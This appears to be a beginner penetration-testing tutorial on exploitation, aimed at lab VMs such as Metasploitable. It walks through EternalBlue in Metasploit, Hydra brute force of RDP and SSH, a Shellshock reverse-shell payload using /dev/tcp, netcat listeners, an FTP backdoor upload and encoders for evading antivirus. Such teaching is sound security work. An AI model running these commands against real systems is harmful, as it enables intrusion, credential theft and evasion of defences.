Exploitation - Breaking Through the Digital Door🚪

Welcome back to our penetration testing series! 👋 If you’ve been following along, you’ve already learned how to identify live systems and discover open ports through enumeration. Now comes the most exciting part – exploitation. This is where theory meets practice, and we actually attempt to gain access to target systems.

What is Exploitation? 🤔

Think of exploitation as using a key you’ve found (vulnerability) to open a door (system access). During the enumeration phase, we identified potential weaknesses – maybe an outdated service, default credentials, or a known vulnerability. Now, we’ll learn how to leverage these findings to gain actual access to systems.

In Simple Terms: Imagine you’re a locksmith helping someone who’s locked out of their house. Exploitation is like finding the right technique to open the lock - maybe you use a spare key they forgot about (default passwords), or you find a window that’s been left open (unpatched vulnerability). The goal is to help them get back inside safely!

🔍 Quick Refresher: If you’re new to penetration testing, think of it as “ethical hacking” - we’re the good guys helping organizations find security holes before the bad guys do! It’s like being a digital security guard who tests all the locks and alarms.

⚠️ Important Note: This guide is for educational purposes and authorized testing only. Never attempt these techniques on systems you don’t own or have explicit permission to test.

Understanding the Exploitation Process 📋

Before diving into specific techniques, let’s understand what happens during exploitation:

1. Target Selection: Based on your enumeration results, you choose which vulnerability to exploit
2. Exploit Preparation: You prepare your tools and set up listeners if needed
3. Execution: You launch the exploit against the target
4. Access Verification: You confirm successful exploitation and document your access level

🤓 What is Enumeration? Enumeration is like being a detective gathering clues! In the previous stages of penetration testing, we “enumerated” (discovered and listed) all the services, ports, and potential vulnerabilities on our target systems. It’s like walking around a building and noting all the doors, windows, security cameras, and anything else that might be useful to know. We’re not breaking in yet - just gathering information!

🤓 What is a Vulnerability? A vulnerability is like a weakness or flaw in a system - think of it as a broken lock, an open window, or a guard who takes predictable breaks. In cybersecurity, it’s any weakness that could potentially be exploited to gain unauthorized access or cause harm.

🤓 What are CVE Numbers? CVE stands for “Common Vulnerabilities and Exposures” - think of it like a license plate for security flaws! Each discovered vulnerability gets a unique CVE number (like CVE-2017-0144 for EternalBlue). It’s like having a filing system so security professionals worldwide can talk about the same vulnerability using the same reference number.

Setting Up Your Environment 🛠️

Before we start exploiting, ensure you have:

• Kali Linux or similar penetration testing distribution
• Metasploit Framework installed
• Target systems (use vulnerable VMs like Metasploitable, DVWA, or HackTheBox)
• Network connectivity to your targets

🤓 Beginner’s Corner: Understanding the Tools

What is Kali Linux? 🐉 Kali Linux is like a Swiss Army knife for cybersecurity professionals! It’s a special version of Linux that comes pre-loaded with hundreds of security testing tools. Think of it as your hacker’s toolkit - everything you need is already installed and ready to go.

What is Metasploit? 🎯 Metasploit is like having a master key collection for digital locks. It’s a framework that contains thousands of pre-built exploits (think “lock-picking techniques”) that work against known vulnerabilities. Instead of writing complex code from scratch, you can use Metasploit’s ready-made tools!

What are VMs (Virtual Machines)? 💻 Virtual Machines are like having multiple computers inside your computer! You can run a “virtual” Windows or Linux system for practice without affecting your main computer. It’s like having a sandbox where you can safely break things and learn.

Common Exploitation Techniques 🎯

Let’s explore practical exploitation methods for both Windows and Linux systems, starting with the basics.

🌐 Understanding Network Services (The Digital Doors)

Before we start picking locks, let’s understand what we’re dealing with! Think of network services as different types of doors and windows on a digital house:

Service	Port	What It Does	Why It Matters
SMB 🏠	139/445	Often has security holes on older systems
SSH 🔐	22	Remote control of Linux/Unix systems	Direct access to computer’s “brain”
FTP 📁	21	File transfers between computers	Often allows anonymous access
RDP 🖥️	3389	Remote control of Windows computers	Like having physical computer access

🔍 Understanding Ports and Scanning

Now that we know what these services do, let’s talk about how to find them! 🕵️‍♂️

What are Ports? 🚪 Think of ports like apartment numbers in a building. Each service (like SSH, FTP, etc.) lives at a specific “apartment number” (port). Common ports include:

• Port 22: SSH (the secure remote access door)
• Port 80: HTTP (regular websites)
• Port 443: HTTPS (secure websites)
• Port 21: FTP (file transfer)
• Port 3389: RDP (remote desktop)

What is Nmap? 🗺️ Nmap is like a digital reconnaissance tool - it knocks on all the doors (ports) to see which ones are open and what services are running behind them. It’s like being a detective gathering information about a building before planning your entry.

---

Now that we understand the basics of network services and how to find them, let’s dive into the exciting part - actually exploiting these services! We’ll start with Windows systems since they’re commonly found in corporate environments. 🏢

---

🔐 Windows Exploitation Techniques

1. Exploiting SMB with EternalBlue (MS17-010)

EternalBlue is perhaps the most famous Windows exploit, affecting older unpatched systems. It targets a vulnerability in the SMB (Server Message Block) protocol we just learned about!

First, check if the target is vulnerable:

# Use nmap to check for the vulnerability
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.100

Example output if vulnerable:

Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:30 EST
Nmap scan report for 192.168.1.100
Host is up (0.00050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Understanding the vulnerability:

• Affects: Windows Vista, 7, 8.1, 10, Server 2008, 2012, 2016
• Impact: Remote code execution with SYSTEM privileges
• Why it works: Buffer overflow in SMBv1 implementation

🤓 What’s a Buffer Overflow? Think of it like overfilling a coffee cup. In programming, a “buffer” is like a container that holds data. When you pour too much data into it (like overfilling the cup), it spills over and can overwrite important parts of the computer’s memory. Hackers can carefully control this “spill” to make the computer run their code instead of the intended program! It’s like tricking the coffee machine into making tea instead. ☕➡️🍵

Exploitation using Metasploit:

# Start Metasploit
msfconsole

Metasploit startup output:

                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                             https://metasploit.com

       =[ metasploit v6.3.4-dev                          ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use sessions -1 to interact with the 
last opened session

msf6 > 

# Search for the exploit
msf6 > search eternalblue

# Use the exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Options output:

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.50     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

# Set the target IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100

# Set your IP (for the reverse connection)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.50
LHOST => 192.168.1.50

# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Successful exploitation output:

[*] Started reverse TCP handler on 192.168.1.50:4444 
[*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.100:445 - The target is vulnerable.
[*] 192.168.1.100:445 - Connecting to target for exploitation.
[+] 192.168.1.100:445 - Connection established for exploitation.
[+] 192.168.1.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.100:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.100:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.100:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.1.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.100:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.100:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.100:445 - Starting non-paged pool grooming
[+] 192.168.1.100:445 - Sending SMBv2 buffers
[+] 192.168.1.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.100:445 - Sending final SMBv2 buffers.
[*] 192.168.1.100:445 - Sending last fragment of exploit packet!
[*] 192.168.1.100:445 - Receiving response from exploit packet
[+] 192.168.1.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.100:445 - Sending egg to corrupted connection.
[*] 192.168.1.100:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.100:49158) at 2024-01-15 10:32:41 -0500

meterpreter > 

What happens behind the scenes:

1. Metasploit sends specially crafted SMB packets
2. The buffer overflow occurs, allowing code execution
3. A reverse shell payload is executed
4. The target connects back to your machine

Great! We’ve just seen how a complex exploit like EternalBlue works. But sometimes the simplest approach is the most effective. Let’s look at exploiting systems that use weak or default passwords - you’d be amazed how often this works! 🤦‍♂️

2. Exploiting Windows with Default/Weak Credentials 🔑

Many Windows systems, especially in lab environments, use default or weak credentials.

🤓 What are Credentials? Credentials are like your digital ID card - they’re the username and password combination that proves you’re allowed to access a system. “Default credentials” are like leaving the default password on your WiFi router - they’re the passwords that come pre-set and many people never change them!

What is Brute Force? 🔨 Brute force is like trying every possible key on a keyring until one works! In cybersecurity, it means automatically trying thousands of username/password combinations until you find the right one. It’s not elegant, but it works surprisingly often because people use weak passwords!

What is Hydra? 🐉 Hydra is like a super-fast lock picker that can try thousands of password combinations per minute. It’s named after the mythical creature with multiple heads - it can attack multiple services and try multiple passwords simultaneously!

RDP (Remote Desktop Protocol) Brute Force:

# First, check if RDP is open (port 3389)
nmap -p 3389 192.168.1.100

RDP scan output:

Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:35 EST
Nmap scan report for 192.168.1.100
Host is up (0.00048s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

# Use hydra for brute force
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100

Hydra brute force output:

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-15 10:36:22
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking rdp://192.168.1.100:3389/
[3389][rdp] host: 192.168.1.100   login: administrator   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-15 10:36:45

If successful, connect using:

# Using xfreerdp
xfreerdp /u:administrator /p:password /v:192.168.1.100

Successful RDP connection output:

[10:37:12:234] [1234:1235] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[10:37:12:234] [1234:1235] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[10:37:12:234] [1234:1235] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[10:37:12:234] [1234:1235] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[10:37:12:345] [1234:1235] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[10:37:12:456] [1234:1235] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[10:37:12:567] [1234:1235] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[10:37:12:678] [1234:1235] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp
[10:37:12:789] [1234:1235] [INFO][com.freerdp.crypto] - creating directory /home/kali/.config/freerdp/certs
[10:37:12:890] [1234:1235] [INFO][com.freerdp.crypto] - created directory [/home/kali/.config/freerdp/certs]
[10:37:13:001] [1234:1235] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[10:37:13:001] [1234:1235] [WARN][com.freerdp.crypto] - CN = WIN-ABCD1234567
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - @           WARNING: CERTIFICATE NAME MISMATCH!           @
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - The hostname used for this connection (192.168.1.100:3389) 
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - Common Name (CN):
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - 	WIN-ABCD1234567
[10:37:13:001] [1234:1235] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 192.168.1.100:3389 (RDP-Server):
	Common Name: WIN-ABCD1234567
	Subject:     CN = WIN-ABCD1234567
	Issuer:      CN = WIN-ABCD1234567
	Thumbprint:  01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef:01:23:45:67:89:ab:cd:ef
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y

Then a Windows desktop window opens showing successful access! 🎉

---

🐧 Linux Exploitation Techniques

1. Exploiting Shellshock Vulnerability 🐚

Shellshock affects systems running vulnerable versions of Bash, often through CGI scripts.

🤓 What is Bash? Bash is like the “command interpreter” on Linux/Unix systems - it’s the program that understands and executes commands when you type them. Think of it as the “brain” that processes your text commands and makes the computer do what you want!

🤓 What is CGI? CGI (Common Gateway Interface) is like a translator between web servers and programs. When you fill out a form on a website, CGI helps the web server run a program to process your information. It’s like having a middleman who takes your restaurant order and tells the kitchen what to cook!

🤓 What is Shellshock? Shellshock is a vulnerability where we can trick Bash into running extra commands by hiding them in what looks like harmless information. It’s like sneaking a secret note inside a regular letter - the system reads the “letter” but also accidentally follows the hidden instructions!

Testing for Shellshock:

# First, identify web servers with CGI
nmap -sV -p 80,443 192.168.1.200

Web server scan output:

Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:40 EST
Nmap scan report for 192.168.1.200
Host is up (0.00042s latency).

PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.2.22 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))

# Manual test using curl
curl -A "() { :; }; echo 'Vulnerable to Shellshock'" http://192.168.1.200/cgi-bin/test.cgi

Shellshock test output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>CGI Test</h1>
<p>Your User-Agent: () { :; }; echo 'Vulnerable to Shellshock'</p>
Vulnerable to Shellshock
</body></html>

Exploiting Shellshock for a reverse shell:

# Step 1: Set up a listener on your machine
nc -lvnp 4444

Netcat listener output:

listening on [any] 4444 ...

# Step 2: In another terminal, send the exploit
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.50/4444 0>&1" \
     http://192.168.1.200/cgi-bin/test.cgi

Shell received output:

listening on [any] 4444 ...
connect to [192.168.1.50] from (UNKNOWN) [192.168.1.200] 45678
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
whoami
www-data
www-data@ubuntu:/usr/lib/cgi-bin$ 

Understanding the exploit:

• The vulnerability exists in how Bash processes environment variables
• We inject commands after the function definition
• The server executes our injected command with its privileges

Shellshock is a great example of how web applications can be vulnerable, but let’s look at a more direct approach - targeting SSH services. SSH is incredibly common on Linux systems and is often a prime target for attackers! 🎯

2. Exploiting SSH Services 🔐

SSH is often a prime target, especially with weak credentials.

SSH Enumeration and Exploitation:

# Step 1: Enumerate SSH version and check for vulnerabilities
nmap -sV -p 22 --script ssh* 192.168.1.200

SSH enumeration output:

Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-15 10:45 EST
Nmap scan report for 192.168.1.200
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:f0:5e:5f:a6:26:3d:e0:3e:7d:2a:87:42:ef:7a:bc (DSA)
|   2048 32:b3:96:52:cc:8c:41:3a:54:df:74:14:c4:53:37:28 (RSA)
|_  256 4f:88:aa:8b:59:ce:9c:6b:b7:aa:5c:67:24:d3:9a:39 (ECDSA)
| ssh2-enum-algos: 
|   kex_algorithms: (9)
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group-exchange-sha1
|       diffie-hellman-group14-sha1
|       diffie-hellman-group1-sha1
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|   server_host_key_algorithms: (3)
|       ssh-rsa
|       ssh-dss
|       ecdsa-sha2-nistp256
|   encryption_algorithms: (16)
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       arcfour256
|       arcfour128
|       aes128-cbc
|       3des-cbc
|       blowfish-cbc
|       cast128-cbc
|       aes192-cbc
|       aes256-cbc
|       arcfour
|       rijndael-cbc@lysator.liu.se
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|   mac_algorithms: (13)
|       hmac-md5
|       hmac-sha1
|       umac-64@openssh.com
|       hmac-ripemd160
|       hmac-ripemd160@openssh.com
|       hmac-sha1-96
|       hmac-md5-96
|       hmac-sha2-256
|       hmac-sha2-256-96
|       hmac-sha2-512
|       hmac-sha2-512-96
|       hmac-sha1-etm@openssh.com
|       hmac-sha1-96-etm@openssh.com
|   compression_algorithms: (2)
|       none
|       zlib@openssh.com
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# Step 2: Try common username combinations
hydra -L /usr/share/wordlists/metasploit/unix_users.txt \
      -P /usr/share/wordlists/metasploit/unix_passwords.txt \
      ssh://192.168.1.200

Hydra SSH brute force output:

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-15 10:46:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:109/p:109), ~64 tries per task
[DATA] attacking ssh://192.168.1.200:22/
[22][ssh] host: 192.168.1.200   login: msfadmin   password: msfadmin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-15 10:46:32

Manual SSH connection:

# If credentials are found
ssh msfadmin@192.168.1.200

SSH login output:

The authenticity of host '192.168.1.200 (192.168.1.200)' can't be established.
ECDSA key fingerprint is SHA256:4f:88:aa:8b:59:ce:9c:6b:b7:aa:5c:67:24:d3:9a:39.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.200' (ECDSA) to the list of known hosts.
msfadmin@192.168.1.200's password: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/

msfadmin@metasploitable:~$ 

SSH gives us direct command-line access, but sometimes we need to look at file transfer services as well. FTP services are often overlooked but can provide excellent opportunities for gaining access or escalating privileges! 📁

3. Exploiting FTP Services 📁

FTP services often have misconfigurations or allow anonymous access.

Anonymous FTP Access:

# Check for anonymous access
ftp 192.168.1.200

Anonymous FTP output:

Connected to 192.168.1.200.
220 (vsFTPd 2.3.4)
Name (192.168.1.200:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

# If successful:
ftp> ls
ftp> pwd
ftp> cd /var/ftp/pub
ftp> get interesting_file.txt
ftp> put backdoor.php  # If write access is allowed

FTP directory listing:

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        65534        4096 Mar 17  2010 writable
226 Directory send OK.
ftp> cd writable
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
13 bytes sent in 0.00 secs (127.0781 kB/s)
ftp> 

Setting Up Listeners and Catching Shells 🎣

Many exploits require a listener to catch reverse shells. Here are common methods:

🤓 Understanding Shells and Listeners

What is a Shell? 🐚 A shell is like a command prompt or terminal - it’s a text-based interface where you can type commands to control a computer. When we “get a shell” on a target system, we’re essentially getting a command line interface that lets us control that computer remotely!

What’s the Difference Between Reverse and Bind Shells? 🔄

Reverse Shell (Target calls you):

• Imagine you’re waiting by your phone, and the target computer calls YOU
• The target connects back to your computer
• Like saying “Hey target, when you get hacked, call me at this number!”

Bind Shell (You call the target):

• Imagine the target computer opens a phone line and waits for you to call
• You connect to the target computer
• Like saying “Hey target, answer the phone when I call you!”

What is a Listener? 👂 A listener is like sitting by the phone waiting for a call. Your computer “listens” on a specific port (phone number) for incoming connections from compromised systems. When an exploit succeeds, the target system “calls” your listener and establishes a connection!

🔧 What is Netcat?

Netcat is like the Swiss Army knife of networking! It’s a simple but powerful tool that can:

• Set up listeners (wait for connections)
• Make connections to other systems
• Transfer files
• Create basic backdoors

Think of it as a universal adapter that can connect to almost anything network-related!

Netcat Listener

# Basic listener
nc -lvnp 4444

Netcat listener ready:

listening on [any] 4444 ...

Metasploit Multi/Handler

msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j  # Run as a job

Multi/handler output:

[*] Started reverse TCP handler on 192.168.1.50:4444 
[*] Starting the payload handler...
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) > 
[*] Command shell session 1 opened (192.168.1.50:4444 -> 192.168.1.200:54321) at 2024-01-15 10:50:23 -0500

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell linux/x86                 192.168.1.50:4444 -> 192.168.1.200:54321 (192.168.1.200)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

Now that we understand how to set up listeners and catch shells, let’s talk about the different types of payloads you can use. Choosing the right payload for your situation can make the difference between success and failure! 🎯

Understanding Payload Types 🎯

When exploiting, you’ll encounter different payload types:

Reverse Shell: Target connects back to you

• ✅ Pros: Bypasses most firewalls
• ❌ Cons: Requires your IP to be reachable

Bind Shell: Opens a port on the target

• ✅ Pros: No need for target to reach you
• ❌ Cons: Often blocked by firewalls

Meterpreter: Advanced payload with many features

• ✅ Pros: Encrypted, feature-rich
• ❌ Cons: More likely to be detected by AV

🤓 What is Meterpreter? Meterpreter is like the “luxury model” of shells! While a basic shell gives you a simple command line, Meterpreter is like having a full toolkit with advanced features. It can take screenshots, record keystrokes, pivot to other systems, and much more. Think of it as the difference between a basic walkie-talkie and a high-tech smartphone!

🤓 What is Antivirus (AV)? Antivirus software is like a security guard for your computer. It watches for suspicious activity and known malicious programs. Advanced payloads like Meterpreter are more likely to be recognized and blocked by these digital security guards, which is why sometimes simpler is better for staying undetected!

Great! Now that we understand the tools and techniques, let’s talk about how to use them effectively. Even with the best tools, exploitation can be tricky, so here are some hard-earned lessons from the field! 💡

Best Practices During Exploitation 🌟

Start Simple: Try default credentials before complex exploits - they work more often than you’d think! 😊

Document Everything: Keep detailed notes of what worked and what didn’t. Future you will thank present you! 📝

Be Patient: Exploits can fail for various reasons. Don’t get discouraged - troubleshoot systematically and try different approaches. 🧘‍♂️

Check Your Listeners: Always ensure your listener is running before launching exploits. It’s embarrassing when an exploit works but you’re not listening! 🤦‍♂️

Verify Access: Always confirm you have the access level you expected. Sometimes you get more (or less) than anticipated. 🔍

Even with the best preparation and following all the best practices, things can still go wrong. Don’t worry - this is completely normal! Exploitation often involves trial and error. Let’s look at the most common issues you’ll encounter and how to fix them. 🔧

Troubleshooting Common Issues 🛠️

Exploit Fails to Run

• Verify the target is actually vulnerable (double-check with scanners)
• Check if the service is running (maybe it restarted?)
• Ensure network connectivity (can you ping the target?)
• Try different payload types or exploit variations

No Shell Received 😞

• Confirm your IP is correct in LHOST (check with ip addr or ifconfig)
• Check firewall rules on both sides (are ports blocked?)
• Try different ports like 443, 8080, or 8443 (they’re often allowed through firewalls)
• Use a different payload type (sometimes bind shells work when reverse don’t)

Connection Drops Immediately 📉

• The exploit worked but something killed the session (AV, IDS, or timeout)
• Try a different payload (maybe something more stealthy)
• Check for antivirus or intrusion detection systems
• Use encoding options in Metasploit to evade detection

Example of using encoders:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set ENCODER x64/xor_dynamic
msf6 exploit(windows/smb/ms17_010_eternalblue) > set ITERATIONS 3
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

🤓 What are Encoders? Encoders are like disguises for your exploit code! They scramble or “encode” your payload to make it look different, helping it sneak past antivirus software and security systems. It’s like putting on a fake mustache and glasses to avoid being recognized. The ITERATIONS setting is like putting on multiple disguises - the more iterations, the better the disguise, but it also makes the payload larger!

Don’t get discouraged if you encounter these issues - they’re part of the learning process! The more you practice, the better you’ll become at diagnosing and fixing problems. Remember, even experienced penetration testers run into these same issues regularly. 😊

What’s Next? 🚀

Congratulations! You’ve now learned the basics of exploitation. You should be able to:

• Identify and exploit common vulnerabilities like EternalBlue and Shellshock
• Use Metasploit for automated exploitation
• Set up listeners and handle reverse shells
• Troubleshoot common exploitation issues like a pro! 💪

In the next part of this series, we’ll cover Post-Exploitation techniques, including privilege escalation methods, maintaining persistence, lateral movement through networks, and data exfiltration techniques. That’s where the real fun begins! 🎭

🤓 What’s Post-Exploitation? Post-exploitation is what happens AFTER you’ve successfully gained access to a system. It’s like getting inside a building - now what do you do? Post-exploitation techniques include:

• Privilege Escalation: Getting higher-level access (like going from being a “guest” to becoming an “administrator”)
• Maintaining Persistence: Making sure you can get back in later (like hiding a spare key)
• Lateral Movement: Moving from one system to other connected systems (like exploring different rooms in the building)
• Data Exfiltration: Carefully gathering and removing important information (like a spy collecting intelligence)

But before you move on to post-exploitation, it’s crucial to get hands-on practice with these exploitation techniques. Theory is important, but there’s no substitute for actually running these commands and seeing the results! Let’s look at some safe, legal environments where you can practice. 🏆

Practice Resources 📚

To safely practice these techniques, check out these awesome resources:

Metasploitable 2 & 3: Intentionally vulnerable Linux distributions - perfect for beginners! 🎯

DVWA: Damn Vulnerable Web Application - great for web app testing 🌐

HackTheBox: Online platform with realistic targets - join the community! 🏆

TryHackMe: Guided learning with practice boxes - excellent tutorials 🎓

VulnHub: Free vulnerable VMs for practice - download and hack away! 💻

These practice environments are invaluable for building your skills in a safe, controlled setting. Start with the easier ones like DVWA and TryHackMe, then work your way up to more challenging platforms like HackTheBox. Remember, the goal is to learn and improve, not to rush through everything! 🎯

Final Thoughts 💭

Remember, ethical hacking is about improving security, not causing harm. The techniques you’ve learned here are powerful tools that should be used responsibly. Always ensure you have proper authorization before testing any system, and use these skills to make the digital world more secure! 🛡️

